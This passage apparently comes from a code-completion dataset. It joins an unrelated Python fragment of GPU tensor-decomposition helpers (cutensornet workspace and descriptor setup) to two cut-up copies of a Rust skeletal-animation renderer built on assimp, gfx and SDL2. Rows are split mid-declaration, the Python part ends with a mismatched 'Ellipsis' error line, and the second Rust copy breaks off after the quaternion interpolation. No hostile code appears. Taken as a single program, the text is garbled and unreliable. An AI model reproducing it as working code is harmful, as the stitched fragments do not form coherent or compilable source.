key = info['algorithm'] + f'_{name}'
info[key] = algo_status[name].item()
return info
def parse_decompose_operands_options(options, wrapped_operands, allowed_dtype_names=None):
"""
Given the initially wrapped tensors and the network options, move the wrapped operands to the device and create an internal NetworkOptions object.
If cutensornet library handle is not provided in `options`, one will be created in the internal options.
"""
device_id = utils.get_network_device_id(wrapped_operands)
logger = logging.getLogger() if options.logger is None else options.logger
operands_location = 'cuda'
if device_id is None:
operands_location = 'cpu'
device_id = options.device_id
logger.info(f"Begin transferring input data from host to device {device_id}")
wrapped_operands = tensor_wrapper.to(wrapped_operands, device_id)
logger.info("Input data transfer finished")
# initialize handle once if not provided
if options.handle is not None:
own_handle = False
handle = options.handle
else:
own_handle = True
with utils.device_ctx(device_id):
handle = cutn.create()
dtype_name = utils.get_operands_dtype(wrapped_operands)
if allowed_dtype_names is not None and dtype_name not in allowed_dtype_names:
raise ValueError(f"dtype {dtype_name} not supported")
compute_type = options.compute_type if options.compute_type is not None else typemaps.NAME_TO_COMPUTE_TYPE[dtype_name]
package = utils.get_operands_package(wrapped_operands)
allocator = options.allocator if options.allocator is not None else memory._MEMORY_MANAGER[package](device_id, logger)
internal_options = options.__class__(device_id=device_id,
logger=logger,
handle=handle,
blocking=options.blocking,
compute_type=compute_type,
memory_limit=options.memory_limit,
allocator=allocator)
return wrapped_operands, internal_options, own_handle, operands_location
def allocate_and_set_workspace(handle, allocator, workspace_desc, pref, mem_space, workspace_kind, device_id, stream, stream_ctx, logger, task_name=''):
"""
Allocate and set the workspace in the workspace descriptor.
"""
workspace_size = cutn.workspace_get_memory_size(handle, workspace_desc, pref, mem_space, workspace_kind)
# Allocate and set workspace
if mem_space == cutn.Memspace.DEVICE:
with utils.device_ctx(device_id), stream_ctx:
try:
logger.debug(f"Allocating device memory for {task_name}")
workspace_ptr = allocator.memalloc(workspace_size)
except TypeError as e:
message = "The method 'memalloc' in the allocator object must conform to the interface in the "\
"'BaseCUDAMemoryManager' protocol."
raise TypeError(message) from e
logger.debug(f"Finished allocating device memory of size {formatters.MemoryStr(workspace_size)} for decomposition in the context of stream {stream}.")
device_ptr = utils.get_ptr_from_memory_pointer(workspace_ptr)
cutn.workspace_set_memory(handle, workspace_desc, mem_space, workspace_kind, device_ptr, workspace_size)
logger.debug(f"The workspace memory (device pointer = {device_ptr}) has been set in the workspace descriptor.")
return workspace_ptr
elif workspace_size != 0:
# host workspace
logger.debug(f"Allocating host memory for {task_name}")
workspace_host = numpy.empty(workspace_size, dtype=numpy.int8)
logger.debug(f"Finished allocating host memory of size {formatters.MemoryStr(workspace_size)} for decomposition.")
cutn.workspace_set_memory(handle, workspace_desc, mem_space, workspace_kind, workspace_host.ctypes.data, workspace_size)
logger.debug(f"The workspace memory (host pointer = {workspace_host.ctypes.data}) has been set in the workspace descriptor.")
return workspace_host
else:
return None
def _destroy_tensor_descriptors(desc_tensors):
for t in desc_tensors:
if t is not None:
cutn.destroy_tensor_descriptor(t)
def create_operands_and_descriptors(handle, wrapped_operands, size_dict, inputs, outputs, mid_extent, method, device_id, stream_ctx, logger):
"""
Create empty tensor operands and corresponding tensor descriptors for a decomposition problem.
"""
# Create input tensor descriptors, output operands and output tensor descriptors
output_class = wrapped_operands[0].__class__
dtype_name = wrapped_operands[0].dtype
# Compute extents for the outputs
shared_mode_out = list(set(outputs[0]) & set(outputs[1]))[0]
output_extents = [tuple(size_dict[m] if m != shared_mode_out else mid_extent for m in modes) for modes in outputs]
logger.debug("Creating input tensor descriptors.")
input_tensor_descriptors = []
output_tensor_descriptors = []
try:
for (t, modes) in zip(wrapped_operands, inputs):
input_tensor_descriptors.append(t.create_tensor_descriptor(handle, modes))
logger.debug("The input tensor descriptors have been created.")
# Create the output in the context of the current stream to work around a performance issue with CuPy's memory pool.
logger.debug("Beginning output tensors and descriptors creation...")
s = None
s_ptr = 0
output_operands = []
with utils.device_ctx(device_id):
for extent, tensor_modes in zip(output_extents, outputs):
operand = utils.create_empty_tensor(output_class, extent, dtype_name, device_id, stream_ctx)
output_operands.append(operand)
output_tensor_descriptors.append(operand.create_tensor_descriptor(handle, tensor_modes))
if hasattr(method, 'partition') and method.partition is None:
if dtype_name in ['float32', 'complex64']:
s_dtype_name = 'float32'
elif dtype_name in ['float64', 'complex128']:
s_dtype_name = 'float64'
else:
raise ValueError(f"{dtype_name} data type not supported")
s = utils.create_empty_tensor(output_class, (mid_extent, ), s_dtype_name, device_id, stream_ctx)
s_ptr = s.data_ptr
logger.debug("The output tensors and descriptors have been created.")
except:
_destroy_tensor_descriptors(input_tensor_descriptors)
_destroy_tensor_descriptors(output_tensor_descriptors)
raise
return input_tensor_descriptors, output_operands, output_tensor_descriptors, s, s_ptr
def get_return_operand_data(tensor, target_location):
"""
Given a wrapped tensor, fetch the return operand based on the target location.
"""
if tensor is None: # potentially for s
return tensor
if target_location == 'cpu':
return tensor.to('cpu')
else: # already on device
return tensor.tensor
| raise ValueError(f"Ellipsis for all operands must refer to equal number of modes, found {num_implicit_modes}") | conditional_block |
main.rs | #![feature(phase)]
#![feature(globs)]
#[phase(plugin)]
extern crate gfx_macros;
extern crate current;
extern crate shader_version;
extern crate vecmath;
extern crate event;
extern crate input;
extern crate cam;
extern crate gfx;
extern crate device;
extern crate sdl2;
extern crate sdl2_window;
extern crate time;
extern crate image;
extern crate assimp;
use std::cell::RefCell;
use std::collections::HashMap;
use std::io;
use std::num::Float;
use assimp as ai;
use current::{ Set };
use image::GenericImage;
use sdl2_window::Sdl2Window;
use gfx::{ Device, DeviceHelper};
use event::{ Events, WindowSettings };
use event::window::{ CaptureCursor };
const MAX_BONES: uint = 60;
type Vec3 = [f32, ..3];
type Vec4 = [f32, ..4];
type IVec4 = [u32, ..4];
type Mat4 = [Vec4, ..4];
struct TextureStore {
textures: HashMap<String, gfx::TextureHandle>,
}
impl TextureStore {
fn new(directory: &str,
device: &mut gfx::GlDevice,
) -> TextureStore {
let mut textures = HashMap::new();
let dir = Path::new(directory);
let stuff = io::fs::readdir(&dir).unwrap();
for path in stuff.iter() {
match path.extension_str() {
None => continue,
Some(ext) => if ext != "tga" {
continue;
},
}
let mut img = image::open(path).unwrap();
let (w, h) = img.dimensions();
img = image::DynamicImage::ImageRgba8(img.to_rgba());
assert!(img.color() == image::RGBA(8));
let tinfo = gfx::tex::TextureInfo {
width: w as u16,
height: h as u16,
depth: 1,
levels: 1,
kind: gfx::tex::Texture2D,
format: gfx::tex::RGBA8,
};
let img_info = tinfo.to_image_info();
let texture = device.create_texture(tinfo).unwrap();
device.update_texture(
&texture,
&img_info,
img.raw_pixels().as_slice(),
).unwrap();
match path.filename_str() {
Some(fname) => {
textures.insert(fname.into_string(), texture);
println!("Loaded texture: {}", fname);
},
None => panic!("Couldn't create texture from image"),
}
}
TextureStore {
textures: textures
}
}
}
struct BoneMap {
/// Translates a bone name into a bone id
pub bone_map: HashMap<String, u32>,
pub offsets: Vec<ai::Matrix4x4>,
pub transforms: Vec<Mat4>,
}
impl BoneMap {
fn new(scene: &ai::Scene) -> BoneMap {
let mut bone_map = HashMap::new();
let mut offsets = Vec::new();
let mut num_bones = 0u32;
for mesh in scene.get_meshes().iter() {
for bone in mesh.get_bones().iter() {
let name = bone.name.to_string();
match bone_map.get(&name) {
Some(_) => continue,
None => {
bone_map.insert(name, num_bones);
offsets.push(bone.offset_matrix);
num_bones += 1;
}
}
}
}
BoneMap {
bone_map: bone_map,
offsets: offsets,
transforms: Vec::from_elem(MAX_BONES, vecmath::mat4_id()),
}
}
#[inline(always)]
fn get_id(&self, name: &String) -> Option<u32> {
match self.bone_map.get(name) {
None => None,
Some(val) => Some(*val),
}
}
}
struct ModelComponent {
pub batch: ModelBatch,
pub shader_data: ShaderParam,
}
struct Model<'a> {
pub vertices: Vec<Vertex>,
pub indices: Vec<u32>,
pub batches: Vec<ModelComponent>,
pub scene: ai::Scene<'a>,
pub bone_map: RefCell<BoneMap>,
pub global_inverse: ai::Matrix4x4,
pub bone_transform_buffer: gfx::BufferHandle<Mat4>,
}
#[inline(always)]
fn lerp<S, T: Add<T,T> + Sub<T,T> + Mul<S,T>>(start: T, end: T, s: S) -> T {
return start + (end - start) * s;
}
impl<'a> Model<'a> {
fn from_file(ai_scene: ai::Scene<'a>,
graphics: &mut gfx::Graphics<gfx::GlDevice, gfx::GlCommandBuffer>,
program: &gfx::ProgramHandle,
state: &gfx::DrawState,
texture_store: &TextureStore,
) -> Model<'a> {
// calculate the space we need to allocate
let mut num_vertices = 0;
let mut num_indices = 0;
for mesh in ai_scene.get_meshes().iter() {
num_vertices += mesh.num_vertices;
num_indices += mesh.num_faces * 3;
}
// prepare the data structures used to store the scene
let mut vertices = Vec::with_capacity(num_vertices as uint);
let mut indices = Vec::with_capacity(num_indices as uint);
// The bone weights and ids. Each vertex may be influenced by up to
// 4 bones
let mut bone_weights: Vec<Vec4> = Vec::from_elem(num_vertices as uint,
[0.0, ..4]);
let mut bone_ids: Vec<IVec4> = Vec::from_elem(num_vertices as uint,
[0, ..4]);
let bone_map = BoneMap::new(&ai_scene);
// stores the first index of each mesh, used for creating batches
let mut start_indices = Vec::with_capacity(ai_scene.num_meshes as uint + 1);
let mut materials = Vec::with_capacity(ai_scene.num_materials as uint);
let mut batches = Vec::with_capacity(ai_scene.num_meshes as uint);
| // find the textures used by this model from the list of materials
for mat in ai_scene.get_materials().iter() {
let texture_src = mat.get_texture(ai::material::TextureType::Diffuse,
0
);
match texture_src {
Some(s) => {
match texture_store.textures.get(&s) {
Some(t) => materials.push(t),
None => panic!("couldn't load texture: {}", s),
}
}
None => {
panic!("could read texture name from material: {}", texture_src);
}
}
}
// prepare the data for a format that can be loaded to the gpu
{
start_indices.push(0);
for mesh in ai_scene.get_meshes().iter() {
let vert_id_offset = vertices.len() as u32;
// get all the bone information for this mesh
for bone in mesh.get_bones().iter() {
let bone_id = bone_map.get_id(&bone.name.to_string());
// println!("{}: Bone id and name: {} ===> {}",
// mesh_num, bone_id, bone.name);
let bone_id = match bone_id {
None => panic!("Invaild bone reference"),
Some(id) => id,
};
'next_weight: for vert_weight in bone.get_weights().iter() {
let vertex_id = (vert_id_offset + vert_weight.vertex_id) as uint;
for i in range(0u, 4) {
if bone_ids[vertex_id][i] == 0 {
bone_weights[vertex_id][i] = vert_weight.weight;
bone_ids[vertex_id][i] = bone_id;
continue 'next_weight;
}
}
// assimp should have limited bone weights to 4
unreachable!();
}
}
let verts = mesh.get_vertices();
let norms = mesh.get_normals();
let tex_coords = mesh.get_texture_coords();
// fill up the vertex buffer
for i in range(0u, verts.len()) {
vertices.push( Vertex {
a_position: verts[i].to_array(),
a_normal: norms[i].to_array(),
a_tex_coord: if tex_coords.len() == 0 {
[0.0, 0.0, 0.0]
} else {
// only support 1 texture coord
tex_coords[0][i].to_array()
},
a_bone_weights: bone_weights[i + vert_id_offset as uint],
a_bone_ids: bone_ids[i + vert_id_offset as uint],
});
}
// fill up the index buffer
for face in mesh.get_faces().iter() {
let face_indices = face.get_indices();
assert!(face_indices.len() == 3);
indices.push(face_indices[0] + vert_id_offset);
indices.push(face_indices[1] + vert_id_offset);
indices.push(face_indices[2] + vert_id_offset);
}
start_indices.push(indices.len() as u32);
}
}
// create the vertex and index buffers
// generate the batches used to draw the object
{
let vert_buf = graphics.device.create_mesh(vertices.as_slice());
let ind_buf = graphics.device.create_buffer_static(indices.as_slice());
let mut buf_slices = Vec::with_capacity(ai_scene.num_meshes as uint + 1);
for ind in start_indices.windows(2) {
buf_slices.push(gfx::Slice {
start: ind[0],
end: ind[1],
prim_type: gfx::TriangleList,
// prim_type: gfx::LineStrip,
kind: gfx::SliceKind::Index32(ind_buf, 0 as u32),
});
}
for (slice, mesh) in buf_slices.iter()
.zip(ai_scene.get_meshes().iter()) {
let shader_data = ShaderParam {
u_model_view_proj: vecmath::mat4_id(),
t_color: (*materials[mesh.material_index as uint], None),
u_bone_transformations: u_bone_transformations.raw(),
};
batches.push(ModelComponent {
batch: graphics.make_batch(program,
&vert_buf,
*slice,
state).unwrap(),
shader_data: shader_data,
});
}
}
Model {
vertices: vertices,
indices: indices,
batches: batches,
bone_map: RefCell::new(bone_map),
bone_transform_buffer: u_bone_transformations,
global_inverse: ai_scene.get_root_node().transformation.inverse(),
scene: ai_scene,
}
}
fn interpolate_position(&self,
time: f64,
node: &ai::animation::NodeAnim
) -> ai::Vector3D {
let keys = node.get_position_keys();
// only one key, so no need to interpolate
if keys.len() == 1 {
return keys[0].value
}
// otherwise, find out which keys the given time falls between
// and interpolate
for pos_keys in keys.windows(2) {
// note: once we find a match, we return
if time < pos_keys[1].time {
let dt = pos_keys[1].time - pos_keys[0].time;
// how far inbetween the frams we are on a scale from 0 to 1
let s = (time - pos_keys[0].time) / dt;
return lerp(pos_keys[0].value,
pos_keys[1].value,
s as f32);
}
}
// get the last frame, if we didn't find a match
return keys[keys.len()-1].value
}
fn interpolate_scaling(&self,
time: f64,
node: &ai::animation::NodeAnim
) -> ai::Vector3D {
let keys = node.get_scaling_keys();
// only one key, so no need to interpolate
if keys.len() == 1 {
return keys[0].value
}
// otherwise, find out which keys the given time falls between
// and interpolate
for scale_keys in keys.windows(2) {
// note: once we find a match, we return
if time < scale_keys[1].time {
let dt = scale_keys[1].time - scale_keys[0].time;
// how far in between the frames we are, on a scale from 0 to 1
let s = (time - scale_keys[0].time) / dt;
return lerp(scale_keys[0].value,
scale_keys[1].value,
s as f32);
}
}
// get the last frame, if we didn't find a match
return keys[keys.len()-1].value
}
fn interpolate_rotation(&self,
time: f64,
node: &ai::animation::NodeAnim
) -> ai::Quaternion {
let keys = node.get_rotation_keys();
// only one key, so no need to interpolate
if keys.len() == 1 {
return keys[0].value
}
// otherwise, find out which keys the given time falls between
// and interpolate
for rot_keys in keys.windows(2) {
// note: once we find a match, we return
if time < rot_keys[1].time {
let dt = rot_keys[1].time - rot_keys[0].time;
// how far in between the frames we are, on a scale from 0 to 1
let s = (time - rot_keys[0].time) / dt;
// nlerp
return lerp(rot_keys[0].value,
rot_keys[1].value,
s as f32).normalize();
}
}
// get the last frame, if we didn't find a match
return keys[keys.len()-1].value
}
fn update_bone_transforms(&self,
time: f64,
anim_num: uint,
scene_node: &ai::scene::Node,
parent_transform: &ai::Matrix4x4,
) {
// calculate the transformation matrix for this node
let animation = self.scene.get_animations()[anim_num];
let node_transform = match animation.find_node_anim(&scene_node.name) {
Some(node_anim) => {
self.interpolate_position(time, node_anim).translation_matrix() *
self.interpolate_rotation(time, node_anim).rotation_matrix() *
self.interpolate_scaling(time, node_anim).scaling_matrix()
},
None => {
scene_node.transformation
}
};
let node_to_global = *parent_transform * node_transform;
let opt_id = {
self.bone_map.borrow().get_id(&scene_node.name.to_string())
};
match opt_id {
None => { },
Some(id) => {
let offset = {
self.bone_map.borrow().offsets[id as uint]
};
{
self.bone_map.borrow_mut().transforms[id as uint] =
(self.global_inverse * node_to_global * offset)
.transpose().to_array();
}
}
}
for child in scene_node.get_children().iter() {
self.update_bone_transforms(time,
anim_num,
*child,
&node_to_global,
);
}
}
fn draw(&mut self,
graphics: &mut gfx::Graphics<gfx::GlDevice, gfx::GlCommandBuffer>,
frame: &gfx::Frame,
time: f64,
transform: Mat4,
) {
self.update_bone_transforms(time,
0,
self.scene.get_root_node(),
&ai::Matrix4x4::identity(),
);
graphics.device.update_buffer(self.bone_transform_buffer,
self.bone_map.borrow().transforms.as_slice(),
0,
);
for &mut component in self.batches.iter() {
component.shader_data.u_model_view_proj = transform;
graphics.draw(&component.batch, &component.shader_data, frame);
}
}
}
#[deriving(Show)]
#[vertex_format]
struct Vertex {
#[as_float]
a_position: [f32, ..3],
#[as_float]
a_normal: [f32, ..3],
#[as_float]
a_tex_coord: [f32, ..3],
#[as_float]
a_bone_weights: [f32, ..4],
a_bone_ids: [u32, ..4],
}
#[shader_param(ModelBatch)]
struct ShaderParam {
u_model_view_proj: Mat4,
/// texture for the mesh
t_color: gfx::shade::TextureParam,
/// mesh transformations caused by bones
u_bone_transformations: gfx::RawBufferHandle,
}
static VERTEX_SRC: gfx::ShaderSource<'static> = shaders! {
GLSL_150: b"
#version 150 core
in vec3 a_position;
in vec3 a_normal;
in vec3 a_tex_coord;
in vec4 a_bone_weights;
in ivec4 a_bone_ids;
out vec2 v_TexCoord;
const int MAX_BONES = 60;
uniform mat4 u_model_view_proj;
uniform u_bone_transformations {
mat4[MAX_BONES] bones;
} u_bones;
void main() {
mat4 bone_trans = u_bones.bones[a_bone_ids[0]] * a_bone_weights[0];
bone_trans += u_bones.bones[a_bone_ids[1]] * a_bone_weights[1];
bone_trans += u_bones.bones[a_bone_ids[2]] * a_bone_weights[2];
bone_trans += u_bones.bones[a_bone_ids[3]] * a_bone_weights[3];
gl_Position = u_model_view_proj * bone_trans * vec4(a_position, 1.0);
v_TexCoord = vec2(a_tex_coord);
}
"
};
static FRAGMENT_SRC: gfx::ShaderSource<'static> = shaders! {
GLSL_150: b"
#version 150 core
in vec2 v_TexCoord;
out vec4 o_Color;
uniform sampler2D t_color;
void main() {
vec4 tex = texture(t_color, v_TexCoord);
float blend = dot(v_TexCoord-vec2(0.5,0.5), v_TexCoord-vec2(0.5,0.5));
o_Color = mix(tex, vec4(0.0,0.0,0.0,0.0), blend*1.0);
}
"
};
#[start]
fn start(argc: int, argv: *const *const u8) -> int {
std::rt::start(argc, argv, main)
}
fn main() {
let (win_width, win_height) = (640, 480);
let mut window = Sdl2Window::new(
shader_version::opengl::OpenGL_3_2,
WindowSettings {
title: "model".to_string(),
size: [win_width, win_height],
fullscreen: false,
exit_on_esc: true,
samples: 4,
}
);
window.set_mut(CaptureCursor(true));
let mut device = gfx::GlDevice::new(|s| unsafe {
std::mem::transmute(sdl2::video::gl_get_proc_address(s))
});
let frame = gfx::Frame::new(win_width as u16, win_height as u16);
let state = gfx::DrawState::new().depth(gfx::state::LessEqual, true);
ai::log::add_log_stream(ai::log::Stdout);
let _ = device.create_sampler(
gfx::tex::SamplerInfo::new(
gfx::tex::Bilinear,
gfx::tex::Clamp
)
);
let program = device.link_program(
VERTEX_SRC.clone(),
FRAGMENT_SRC.clone()
).unwrap();
let texture_store = TextureStore::new("../assets/guard-md5",
&mut device
);
let mut graphics = gfx::Graphics::new(device);
let mut importer = ai::Importer::new();
// limit bone weights to 4 per vertex
importer.set_import_property(ai::Property::PP_LBW_MAX_WEIGHTS(4));
importer.add_processing_steps(&[
ai::Process::Triangulate,
ai::Process::GenSmoothNormals,
ai::Process::JoinIdenticalVertices,
ai::Process::LimitBoneWeights,
]);
let fname = "../assets/guard-md5/guard.md5mesh";
let ai_scene = match importer.import_from_file(fname) {
Some(scene) => scene,
None => panic!("failed to import scene: {}", fname),
};
let mut model = Model::from_file(ai_scene,
&mut graphics,
&program,
&state,
&texture_store,
);
// Rotate the model 90 deg around the x-axis
let model_view = [
[1.0, 0.0, 0.0, 0.0],
[0.0, 0.0, -1.0, 0.0],
[0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 1.0],
];
let projection = cam::CameraPerspective {
fov: 90.0f32,
near_clip: 0.1,
far_clip: 1000.0,
aspect_ratio: (win_width as f32) / (win_height as f32)
}.projection();
let mut first_person = cam::FirstPerson::new(
[0.0, 33.0, 48.0],
cam::FirstPersonSettings::keyboard_wasd()
);
first_person.velocity = 30.0f32;
first_person.settings.speed_vertical = 30.0f32;
let start = time::get_time();
let window = RefCell::new(window);
for e in Events::new(&window) {
use event::RenderEvent;
let now = time::get_time() - start;
let time = 18.0 * now.num_milliseconds() as f64 / 1e3;
let fmod = |x: f64, y: f64| -> f64 {
x - (x/y).floor() * y
};
let time = fmod(time , 140.0);
first_person.event(&e);
e.render(|args| {
graphics.clear(
gfx::ClearData {
color: [0.3, 0.3, 0.3, 1.0],
depth: 1.0,
stencil: 0,
},
gfx::COLOR | gfx::DEPTH,
&frame
);
let u_model_view_proj =
cam::model_view_projection(
model_view,
first_person.camera(args.ext_dt).orthogonal(),
projection
);
model.draw(&mut graphics,
&frame,
time,
u_model_view_proj,
);
graphics.end_frame();
});
}
} | // Create the buffer for the bone transformations. We fill this
// up each time we draw, so no need to do it here.
let u_bone_transformations: gfx::BufferHandle<Mat4> =
graphics.device.create_buffer(MAX_BONES, gfx::BufferUsage::Dynamic);
| random_line_split |
main.rs | #![feature(phase)]
#![feature(globs)]
#[phase(plugin)]
extern crate gfx_macros;
extern crate current;
extern crate shader_version;
extern crate vecmath;
extern crate event;
extern crate input;
extern crate cam;
extern crate gfx;
extern crate device;
extern crate sdl2;
extern crate sdl2_window;
extern crate time;
extern crate image;
extern crate assimp;
use std::cell::RefCell;
use std::collections::HashMap;
use std::io;
use std::num::Float;
use assimp as ai;
use current::{ Set };
use image::GenericImage;
use sdl2_window::Sdl2Window;
use gfx::{ Device, DeviceHelper};
use event::{ Events, WindowSettings };
use event::window::{ CaptureCursor };
const MAX_BONES: uint = 60;
type Vec3 = [f32, ..3];
type Vec4 = [f32, ..4];
type IVec4 = [u32, ..4];
type Mat4 = [Vec4, ..4];
struct TextureStore {
textures: HashMap<String, gfx::TextureHandle>,
}
impl TextureStore {
fn new(directory: &str,
device: &mut gfx::GlDevice,
) -> TextureStore {
let mut textures = HashMap::new();
let dir = Path::new(directory);
let stuff = io::fs::readdir(&dir).unwrap();
for path in stuff.iter() {
match path.extension_str() {
None => continue,
Some(ext) => if ext != "tga" {
continue;
},
}
let mut img = image::open(path).unwrap();
let (w, h) = img.dimensions();
img = image::DynamicImage::ImageRgba8(img.to_rgba());
assert!(img.color() == image::RGBA(8));
let tinfo = gfx::tex::TextureInfo {
width: w as u16,
height: h as u16,
depth: 1,
levels: 1,
kind: gfx::tex::Texture2D,
format: gfx::tex::RGBA8,
};
let img_info = tinfo.to_image_info();
let texture = device.create_texture(tinfo).unwrap();
device.update_texture(
&texture,
&img_info,
img.raw_pixels().as_slice(),
).unwrap();
match path.filename_str() {
Some(fname) => {
textures.insert(fname.into_string(), texture);
println!("Loaded texture: {}", fname);
},
None => panic!("Couldn't create texture from image"),
}
}
TextureStore {
textures: textures
}
}
}
struct BoneMap {
/// Translates a bone name into a bone id
pub bone_map: HashMap<String, u32>,
pub offsets: Vec<ai::Matrix4x4>,
pub transforms: Vec<Mat4>,
}
impl BoneMap {
fn new(scene: &ai::Scene) -> BoneMap {
let mut bone_map = HashMap::new();
let mut offsets = Vec::new();
let mut num_bones = 0u32;
for mesh in scene.get_meshes().iter() {
for bone in mesh.get_bones().iter() {
let name = bone.name.to_string();
match bone_map.get(&name) {
Some(_) => continue,
None => {
bone_map.insert(name, num_bones);
offsets.push(bone.offset_matrix);
num_bones += 1;
}
}
}
}
BoneMap {
bone_map: bone_map,
offsets: offsets,
transforms: Vec::from_elem(MAX_BONES, vecmath::mat4_id()),
}
}
#[inline(always)]
fn get_id(&self, name: &String) -> Option<u32> {
match self.bone_map.get(name) {
None => None,
Some(val) => Some(*val),
}
}
}
struct ModelComponent {
pub batch: ModelBatch,
pub shader_data: ShaderParam,
}
struct | <'a> {
pub vertices: Vec<Vertex>,
pub indices: Vec<u32>,
pub batches: Vec<ModelComponent>,
pub scene: ai::Scene<'a>,
pub bone_map: RefCell<BoneMap>,
pub global_inverse: ai::Matrix4x4,
pub bone_transform_buffer: gfx::BufferHandle<Mat4>,
}
#[inline(always)]
fn lerp<S, T: Add<T,T> + Sub<T,T> + Mul<S,T>>(start: T, end: T, s: S) -> T {
return start + (end - start) * s;
}
impl<'a> Model<'a> {
fn from_file(ai_scene: ai::Scene<'a>,
graphics: &mut gfx::Graphics<gfx::GlDevice, gfx::GlCommandBuffer>,
program: &gfx::ProgramHandle,
state: &gfx::DrawState,
texture_store: &TextureStore,
) -> Model<'a> {
// calculate the space we need to allocate
let mut num_vertices = 0;
let mut num_indices = 0;
for mesh in ai_scene.get_meshes().iter() {
num_vertices += mesh.num_vertices;
num_indices += mesh.num_faces * 3;
}
// prepare the data structures used to store the scene
let mut vertices = Vec::with_capacity(num_vertices as uint);
let mut indices = Vec::with_capacity(num_indices as uint);
// The bone weights and ids. Each vertex may be influenced by up to
// 4 bones
let mut bone_weights: Vec<Vec4> = Vec::from_elem(num_vertices as uint,
[0.0, ..4]);
let mut bone_ids: Vec<IVec4> = Vec::from_elem(num_vertices as uint,
[0, ..4]);
let bone_map = BoneMap::new(&ai_scene);
// stores the first index of each mesh, used for creating batches
let mut start_indices = Vec::with_capacity(ai_scene.num_meshes as uint + 1);
let mut materials = Vec::with_capacity(ai_scene.num_materials as uint);
let mut batches = Vec::with_capacity(ai_scene.num_meshes as uint);
// Create the buffer for the bone transformations. We fill this
// up each time we draw, so no need to do it here.
let u_bone_transformations: gfx::BufferHandle<Mat4> =
graphics.device.create_buffer(MAX_BONES, gfx::BufferUsage::Dynamic);
// find the textures used by this model from the list of materials
for mat in ai_scene.get_materials().iter() {
let texture_src = mat.get_texture(ai::material::TextureType::Diffuse,
0
);
match texture_src {
Some(s) => {
match texture_store.textures.get(&s) {
Some(t) => materials.push(t),
None => panic!("couldn't load texture: {}", s),
}
}
None => {
panic!("could read texture name from material: {}", texture_src);
}
}
}
// prepare the data for a format that can be loaded to the gpu
{
start_indices.push(0);
for mesh in ai_scene.get_meshes().iter() {
let vert_id_offset = vertices.len() as u32;
// get all the bone information for this mesh
for bone in mesh.get_bones().iter() {
let bone_id = bone_map.get_id(&bone.name.to_string());
// println!("{}: Bone id and name: {} ===> {}",
// mesh_num, bone_id, bone.name);
let bone_id = match bone_id {
None => panic!("Invaild bone reference"),
Some(id) => id,
};
'next_weight: for vert_weight in bone.get_weights().iter() {
let vertex_id = (vert_id_offset + vert_weight.vertex_id) as uint;
for i in range(0u, 4) {
if bone_ids[vertex_id][i] == 0 {
bone_weights[vertex_id][i] = vert_weight.weight;
bone_ids[vertex_id][i] = bone_id;
continue 'next_weight;
}
}
// assimp should have limited bone weights to 4
unreachable!();
}
}
let verts = mesh.get_vertices();
let norms = mesh.get_normals();
let tex_coords = mesh.get_texture_coords();
// fill up the vertex buffer
for i in range(0u, verts.len()) {
vertices.push( Vertex {
a_position: verts[i].to_array(),
a_normal: norms[i].to_array(),
a_tex_coord: if tex_coords.len() == 0 {
[0.0, 0.0, 0.0]
} else {
// only support 1 texture coord
tex_coords[0][i].to_array()
},
a_bone_weights: bone_weights[i + vert_id_offset as uint],
a_bone_ids: bone_ids[i + vert_id_offset as uint],
});
}
// fill up the index buffer
for face in mesh.get_faces().iter() {
let face_indices = face.get_indices();
assert!(face_indices.len() == 3);
indices.push(face_indices[0] + vert_id_offset);
indices.push(face_indices[1] + vert_id_offset);
indices.push(face_indices[2] + vert_id_offset);
}
start_indices.push(indices.len() as u32);
}
}
// create the vertex and index buffers
// generate the batches used to draw the object
{
let vert_buf = graphics.device.create_mesh(vertices.as_slice());
let ind_buf = graphics.device.create_buffer_static(indices.as_slice());
let mut buf_slices = Vec::with_capacity(ai_scene.num_meshes as uint + 1);
for ind in start_indices.windows(2) {
buf_slices.push(gfx::Slice {
start: ind[0],
end: ind[1],
prim_type: gfx::TriangleList,
// prim_type: gfx::LineStrip,
kind: gfx::SliceKind::Index32(ind_buf, 0 as u32),
});
}
for (slice, mesh) in buf_slices.iter()
.zip(ai_scene.get_meshes().iter()) {
let shader_data = ShaderParam {
u_model_view_proj: vecmath::mat4_id(),
t_color: (*materials[mesh.material_index as uint], None),
u_bone_transformations: u_bone_transformations.raw(),
};
batches.push(ModelComponent {
batch: graphics.make_batch(program,
&vert_buf,
*slice,
state).unwrap(),
shader_data: shader_data,
});
}
}
Model {
vertices: vertices,
indices: indices,
batches: batches,
bone_map: RefCell::new(bone_map),
bone_transform_buffer: u_bone_transformations,
global_inverse: ai_scene.get_root_node().transformation.inverse(),
scene: ai_scene,
}
}
fn interpolate_position(&self,
time: f64,
node: &ai::animation::NodeAnim
) -> ai::Vector3D {
let keys = node.get_position_keys();
// only one key, so no need to interpolate
if keys.len() == 1 {
return keys[0].value
}
// otherwise, find out which keys the given time falls between
// and interpolate
for pos_keys in keys.windows(2) {
// note: once we find a match, we return
if time < pos_keys[1].time {
let dt = pos_keys[1].time - pos_keys[0].time;
// how far in between the frames we are, on a scale from 0 to 1
let s = (time - pos_keys[0].time) / dt;
return lerp(pos_keys[0].value,
pos_keys[1].value,
s as f32);
}
}
// get the last frame, if we didn't find a match
return keys[keys.len()-1].value
}
fn interpolate_scaling(&self,
time: f64,
node: &ai::animation::NodeAnim
) -> ai::Vector3D {
let keys = node.get_scaling_keys();
// only one key, so no need to interpolate
if keys.len() == 1 {
return keys[0].value
}
// otherwise, find out which keys the given time falls between
// and interpolate
for scale_keys in keys.windows(2) {
// note: once we find a match, we return
if time < scale_keys[1].time {
let dt = scale_keys[1].time - scale_keys[0].time;
// how far in between the frames we are, on a scale from 0 to 1
let s = (time - scale_keys[0].time) / dt;
return lerp(scale_keys[0].value,
scale_keys[1].value,
s as f32);
}
}
// get the last frame, if we didn't find a match
return keys[keys.len()-1].value
}
fn interpolate_rotation(&self,
time: f64,
node: &ai::animation::NodeAnim
) -> ai::Quaternion {
let keys = node.get_rotation_keys();
// only one key, so no need to interpolate
if keys.len() == 1 {
return keys[0].value
}
// otherwise, find out which keys the given time falls between
// and interpolate
for rot_keys in keys.windows(2) {
// note: once we find a match, we return
if time < rot_keys[1].time {
let dt = rot_keys[1].time - rot_keys[0].time;
// how far in between the frames we are, on a scale from 0 to 1
let s = (time - rot_keys[0].time) / dt;
// nlerp
return lerp(rot_keys[0].value,
rot_keys[1].value,
s as f32).normalize();
}
}
// get the last frame, if we didn't find a match
return keys[keys.len()-1].value
}
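// Note: the rotation path above is an "nlerp" (normalized linear interpolation):
// a component-wise lerp of the two key quaternions followed by normalize().
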